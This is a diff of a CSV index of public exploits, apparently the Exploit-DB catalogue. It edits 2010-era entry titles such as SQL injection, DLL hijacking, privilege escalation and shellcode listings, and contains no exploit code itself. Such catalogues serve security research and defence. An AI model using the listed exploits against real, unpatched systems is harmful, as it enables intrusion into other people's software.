Vulnerabilities",2010-07-25,"Salvatore Fresta",php,webapps,0 -14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 +14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 & Pun_PM 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) Remote File inclusion",2010-07-26,Li0n-PaL,php,webapps,0 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS",2010-07-26,"Praveen Darshanam",windows,dos,0 @@ -12715,7 +12715,7 @@ id,file,description,date,author,platform,type,port 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote DoS",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 -14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,windows,local,0 +14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,windows,local,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 @@ -12747,7 +12747,7 @@ id,file,description,date,author,platform,type,port 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting (XSS)",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 -14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include",2010-08-03,eidelweiss,php,webapps,0 +14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 14538,platforms/ios/local/14538.txt,"Apple iOS pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 @@ -12788,14 +12788,14 @@ id,file,description,date,author,platform,type,port 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - BlindSQL Injection",2010-08-09,ITSecTeam,php,webapps,0 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection",2010-08-09,"al bayraqim",php,webapps,0 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 -14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 +14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0Day)",2010-08-10,sud0,windows,remote,0 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow PoC",2010-08-10,anonymous,windows,dos,0 -14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 - Directory Transversal",2010-08-10,kripthor,multiple,remote,0 +14602,platforms/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Transversal",2010-08-10,kripthor,multiple,remote,0 14605,platforms/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow (heap spray)",2010-08-10,Madjix,windows,remote,0 14604,platforms/windows/remote/14604.py,"Easy FTP 1.7.0.11 - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0 14606,platforms/multiple/webapps/14606.html,"Zendesk - Multiple Vulnerabilities",2010-08-10,"Luis Santana",multiple,webapps,0 @@ -12805,8 +12805,8 @@ id,file,description,date,author,platform,type,port 14610,platforms/windows/local/14610.txt,"Microsoft Windows - Tracing Registry Key ACL Privilege Escalation",2010-08-10,"Cesar Cerrudo",windows,local,0 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Local Privilege Escalation (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 - Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 -14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 -14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include",2010-08-11,Offensive,php,webapps,0 +14613,platforms/windows/dos/14613.py,"Windows Live Messenger 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 +14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Inclusion",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure",2010-08-11,Offensive,php,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 @@ -12816,7 +12816,7 @@ id,file,description,date,author,platform,type,port 14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 -14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Include",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 +14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - CSRF Change Admin Password",2010-08-12,"KOLTN S",multiple,webapps,80 14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow Exploit",2010-08-13,corelanc0d3r,windows,local,0 @@ -12825,19 +12825,19 @@ id,file,description,date,author,platform,type,port 14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 14637,platforms/php/webapps/14637.txt,"Get Tube - SQL Injection",2010-08-13,Mr.P3rfekT,php,webapps,0 -14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0 +14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Inclusion",2010-08-13,LoSt.HaCkEr,php,webapps,0 14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0 14642,platforms/windows/dos/14642.txt,"Acrobat Acrobat - Font Parsing Integer Overflow",2010-08-14,"Ramz Afzar",windows,dos,0 -14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion",2010-08-14,Pepelux,php,webapps,0 +14643,platforms/php/webapps/14643.txt,"sFileManager 24a - Local File Inclusion",2010-08-14,Pepelux,php,webapps,0 14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0 -14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 +14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 -14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 +14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 & CMySQLite 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection",2010-08-16,Forza-Dz,php,webapps,0 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery SQL Injection",2010-08-16,"al bayraqim",php,webapps,0 @@ -12885,25 +12885,25 @@ id,file,description,date,author,platform,type,port 14717,platforms/php/webapps/14717.txt,"LINK CMS SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0 14718,platforms/php/webapps/14718.txt,"Joomla Component (com_zoomportfolio) SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0 -14721,platforms/windows/local/14721.c,"Wireshark <= 1.2.10 DLL Hijacking Exploit (airpcap.dll)",2010-08-24,TheLeader,windows,local,0 +14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 DLL Hijacking Exploit (airpcap.dll)",2010-08-24,TheLeader,windows,local,0 14722,platforms/php/webapps/14722.txt,"Joomla 1.5 URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0 14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll)",2010-08-24,TheLeader,windows,local,0 -14727,platforms/hardware/local/14727.py,"Foxit Reader <= 4.0 pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 -14726,platforms/windows/local/14726.c,"uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)",2010-08-24,TheLeader,windows,local,0 +14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 pdf Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 +14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)",2010-08-24,TheLeader,windows,local,0 14728,platforms/windows/local/14728.c,"Windows Live Email DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - (article.php) SQL Injection",2010-08-28,[]0iZy5,php,webapps,0 -14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 -14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 +14730,platforms/windows/local/14730.c,"Firefox 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 +14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0 -14734,platforms/windows/local/14734.c,"TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 +14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll)",2010-08-25,"Beenu Arora",windows,local,0 14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll)",2010-08-25,"Beenu Arora",windows,local,0 14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite DLL Hijacking Exploit (mfc71enu.dll)",2010-08-25,"Beenu Arora",windows,local,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 -14739,platforms/windows/local/14739.c,"BS.Player <= 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)",2010-08-25,diwr,windows,local,0 +14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)",2010-08-25,diwr,windows,local,0 14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)",2010-08-25,storm,windows,local,0 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0 @@ -12921,7 +12921,7 @@ id,file,description,date,author,platform,type,port 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 - (Build 788) DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14765,platforms/windows/local/14765.c,"Mediaplayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 -14766,platforms/windows/local/14766.c,"Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 +14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 DLL Hijacking Exploit (wab32.dll)",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE DLL Hijacking Exploit (HomeUtils9.dll)",2010-08-25,storm,windows,local,0 14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 @@ -12944,7 +12944,7 @@ id,file,description,date,author,platform,type,port 14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0 14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0 14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0 -14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 +14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 dll Hijacking Exploit (color.dll)",2010-08-25,"xsploited security",windows,local,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 @@ -12953,7 +12953,7 @@ id,file,description,date,author,platform,type,port 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 -14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Include Exploit",2010-08-26,bd0rk,php,webapps,0 +14808,platforms/php/webapps/14808.pl,"mini CMS / News Script Light 1.0 - Remote File Inclusion Exploit",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM (Ubuntu 10.04 / 2.6.32) - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 @@ -13002,7 +13002,7 @@ id,file,description,date,author,platform,type,port 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 -14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 +14884,platforms/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 - (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 @@ -13031,8 +13031,8 @@ id,file,description,date,author,platform,type,port 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"WordPress Events Manager Extended Plugin - Persistent XSS",2010-09-06,Craw,php,webapps,0 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0 -14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 -14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - (0Day) Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0 +14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 +14927,platforms/php/webapps/14927.txt,"dynpage 1.0 - (0Day) Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14933,platforms/windows/webapps/14933.txt,"ColdBookmarks 1.22 SQL Injection",2010-09-07,mr_me,windows,webapps,0 14934,platforms/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injection Vulnerabilities",2010-09-07,mr_me,windows,webapps,0 @@ -13069,7 +13069,7 @@ id,file,description,date,author,platform,type,port 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 -14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 - Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 +14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus 2010.04.26.648 - Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate (uploadvideos.php) Shell Upload",2010-09-13,Xa7m3d,php,webapps,0 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash PoC",2010-09-13,SONIC,windows,dos,0 @@ -13082,7 +13082,7 @@ id,file,description,date,author,platform,type,port 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0 15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0 -15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara <= 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 +15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara 3.1 - (Sections Module) Remote Blind SQL Injection Exploit",2010-09-14,_mRkZ_,php,webapps,0 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0 15008,platforms/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,windows,dos,0 @@ -13094,7 +13094,7 @@ id,file,description,date,author,platform,type,port 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,windows,dos,0 -15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 +15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0 15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0 15193,platforms/windows/dos/15193.pl,"Hanso Player 1.3.0 - (.m3u) Denial of Service",2010-10-03,"xsploited security",windows,dos,0 @@ -13133,7 +13133,7 @@ id,file,description,date,author,platform,type,port 15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow PoC",2010-09-21,LiquidWorm,windows,remote,0 15072,platforms/windows/remote/15072.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 15073,platforms/windows/remote/15073.rb,"Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)",2010-09-21,Trancer,windows,remote,0 -15074,platforms/linux/local/15074.sh,"mountall <= 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local,0 +15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Local Privilege Escalation",2010-09-21,fuzz,linux,local,0 15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 15078,platforms/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,asp,webapps,0 @@ -13148,26 +13148,26 @@ id,file,description,date,author,platform,type,port 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0 15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion Vulnerabilities",2010-09-23,cOndemned,php,webapps,0 -15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local Include Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 +15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local File Inclusion Vulnerabilities",2010-09-24,sh00t0ut,php,webapps,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0 -15098,platforms/php/webapps/15098.txt,"FreePBX <= 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 +15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win_x86,webapps,80 